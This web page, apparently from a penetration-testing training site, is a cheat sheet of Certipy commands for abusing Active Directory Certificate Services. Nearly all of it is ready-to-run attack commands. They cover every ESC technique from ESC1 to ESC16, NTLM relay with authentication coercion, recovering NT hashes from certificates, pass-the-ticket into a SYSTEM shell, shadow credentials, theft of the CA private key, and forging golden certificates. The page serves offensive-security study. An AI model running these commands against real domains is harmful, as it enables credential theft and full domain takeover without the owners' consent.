active-directory
Certipy — AD CS Abuse (ESC1–ESC16)
Active Directory Certificate Services enumeration and abuse with Certipy v5 — ESC1 through ESC16, NTLM relay to AD CS (ESC8/ESC11), shadow credentials, and golden certificates.
Enumeration & Discovery (5)
certipy find -u [email protected] -p Password123 -dc-ip 10.10.10.1
Enumerate CAs, templates and ACLs — dumps JSON/TXT report
certipy find -u [email protected] -p Password123 -dc-ip 10.10.10.1 -vulnerable -stdout
Show only vulnerable templates (ESC findings) on stdout
certipy find -u [email protected] -p Password123 -dc-ip 10.10.10.1 -vulnerable -enabled
Only enabled AND vulnerable templates (real attack surface)
certipy find -u [email protected] -hashes :NTLMhash -dc-ip 10.10.10.1 -bloodhound
Pass-the-hash enum + BloodHound output for graphing
certipy find -u [email protected] -p Password123 -dc-ip 10.10.10.1 -text -json
Force both text and JSON output of the AD CS layout
ESC1 — SAN Impersonation (3)
certipy req -u [email protected] -p Password123 -dc-ip 10.10.10.1 -target ca.corp.local -ca CORP-CA -template ESC1-Template -upn [email protected]
Request a cert for the template, supplying Administrator UPN in the SAN
certipy req -u [email protected] -p Password123 -ca CORP-CA -template ESC1 -upn [email protected] -dns dc01.corp.local
Add both UPN and DNS SAN (impersonate a machine/DC)
certipy req -u [email protected] -p Password123 -ca CORP-CA -template ESC1 -upn [email protected] -sid S-1-5-21-XXXX-500
Embed target SID (required when StrongCertificateBindingEnforcement is on)
ESC2 / ESC3 — Any-Purpose & Enrollment Agent (3)
certipy req -u [email protected] -p Password123 -ca CORP-CA -template ESC2 -upn [email protected]
ESC2 — Any-Purpose EKU template: request, then auth as anyone
certipy req -u [email protected] -p Password123 -ca CORP-CA -template ESC3-CRA
ESC3 step 1 — obtain a Certificate Request Agent (enrollment agent) cert
certipy req -u [email protected] -p Password123 -ca CORP-CA -template User -pfx agent.pfx -on-behalf-of "corp\administrator"
ESC3 step 2 — use the agent cert to enroll on behalf of a target
ESC4 — Template ACL Abuse (3)
certipy template -u [email protected] -p Password123 -dc-ip 10.10.10.1 -template VulnTemplate -write-default-configuration -save-configuration old.json
You have write rights on the template → overwrite it into an ESC1-able config (saves original)
certipy req -u [email protected] -p Password123 -ca CORP-CA -template VulnTemplate -upn [email protected]
Now exploit the reconfigured template exactly like ESC1
certipy template -u [email protected] -p Password123 -dc-ip 10.10.10.1 -template VulnTemplate -write-configuration old.json
Restore the template to its original configuration (clean up!)
ESC6 / ESC9 / ESC10 — SAN & Mapping Flaws (4)
certipy req -u [email protected] -p Password123 -ca CORP-CA -template User -upn [email protected]
ESC6 — CA has EDITF_ATTRIBUTESUBJECTALTNAME2: any template honours an attacker SAN
certipy account update -u [email protected] -p Password123 -dc-ip 10.10.10.1 -user victim -upn administrator
ESC9/10 step 1 — set a controlled user UPN to the target (needs GenericWrite)
certipy req -u [email protected] -p VictimPass -ca CORP-CA -template ESC9-NoSecExt
ESC9/10 step 2 — request a cert as victim (template lacks SID security extension)
certipy account update -u [email protected] -p Password123 -dc-ip 10.10.10.1 -user victim -upn [email protected]
ESC9/10 step 3 — restore the original UPN, then auth with the cert
ESC7 — CA ACL (ManageCA / ManageCertificates) (4)
certipy ca -u [email protected] -p Password123 -ca CORP-CA -dc-ip 10.10.10.1 -add-officer user
Grant yourself the "officer" (ManageCertificates) right on the CA
certipy ca -u [email protected] -p Password123 -ca CORP-CA -enable-template SubCA
Enable the SubCA template so it can be requested
certipy ca -u [email protected] -p Password123 -ca CORP-CA -issue-request 1337
Approve a pending (failed) certificate request by its ID
certipy req -u [email protected] -p Password123 -ca CORP-CA -retrieve 1337
Retrieve the now-issued certificate after manual approval
ESC8 / ESC11 — NTLM Relay to AD CS (3)
certipy relay -target http://ca.corp.local -template DomainController
ESC8 — relay coerced machine auth to the AD CS HTTP web-enrollment endpoint
certipy relay -target rpc://ca.corp.local -ca CORP-CA -template DomainController
ESC11 — relay to the CA RPC interface (ICertPassage) when packets are unsigned
coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1
Trigger machine auth toward your relay (PetitPotam / PrinterBug / DFSCoerce)
ESC13 / ESC15 / ESC16 — Policy & CA-Wide Flaws (3)
certipy req -u [email protected] -p Password123 -ca CORP-CA -template ESC13-Template
ESC13 — template with an issuance policy linked to a privileged group (OID group link)
certipy req -u [email protected] -p Password123 -ca CORP-CA -template WebServer -upn [email protected] -application-policies "Client Authentication"
ESC15 (EKUwu / CVE-2024-49019) — inject app policies into a v1 schema template
certipy req -u [email protected] -p Password123 -ca CORP-CA -template User -upn [email protected]
ESC16 — CA has the SID security extension disabled domain-wide: pair with a UPN swap like ESC9
Authenticate & UnPAC-the-Hash (4)
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
PKINIT with the cert → get a TGT (.ccache) AND the account NT hash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1 -username administrator -domain corp.local
Disambiguate the identity when the cert has multiple SANs
certipy auth -pfx user.pfx -dc-ip 10.10.10.1 -ldap-shell
Authenticate over LDAP (Schannel) and drop into an interactive LDAP shell
export KRB5CCNAME=administrator.ccache && impacket-psexec -k -no-pass corp.local/[email protected]
Use the recovered TGT for a SYSTEM shell (pass-the-ticket)
Shadow Credentials & Golden Certificate (4)
certipy shadow auto -u [email protected] -p Password123 -dc-ip 10.10.10.1 -account victim$
Shadow Credentials — add a Key Credential, auth, recover the NT hash, then clean up
certipy ca -u [email protected] -p Password123 -ca CORP-CA -dc-ip 10.10.10.1 -backup
Steal the CA private key + cert (requires CA-admin / DA) — basis for a Golden Certificate
certipy forge -ca-pfx CORP-CA.pfx -upn [email protected] -subject "CN=Administrator,CN=Users,DC=corp,DC=local"
GOLDEN CERTIFICATE — forge an auth cert for any user with the stolen CA key (offline)
certipy cert -pfx administrator.pfx -nokey -out admin.crt && certipy cert -pfx administrator.pfx -nocert -out admin.key
Split a .pfx into separate cert and key files (for use with other tools)
Related Articles
5
Active Directory
ADCS Attacks (ESC1–ESC16)
AD CS is the quietest road to Domain Admin: one mis-set checkbox on a certificate template…
Active Directory
Active Directory Attacks
Deep dive into Active Directory attack techniques — Kerberoasting, AS-REP Roasting, Pass-t…
Network Security
Wireshark for Security Professionals
Master Wireshark for security work — capture and display filters, protocol dissection, det…
Active Directory
Golden Ticket Attack — Complete Guide
Golden Ticket Attack Complete Guide: Kerberos Exploitation in Active Directory | LazyHack…
Active Directory
CPTS Exam Walkthrough
A complete, sanitised CPTS-style walkthrough — two trusted Active Directory forests compro…
Related Courses
3
⭐ Premium
Intermediate
Network Penetration Testing
From host discovery to Active Directory attacks
Beginner
Networking Fundamentals for Pentesters
Understand how networks actually work — so you can break them. TCP/IP, routing, protocols,…
⭐ Premium
Intermediate
Windows Privilege Escalation — Complete Course
From whoami /priv to NT AUTHORITY\SYSTEM — every technique, tool, and HTB/THM/PG practice …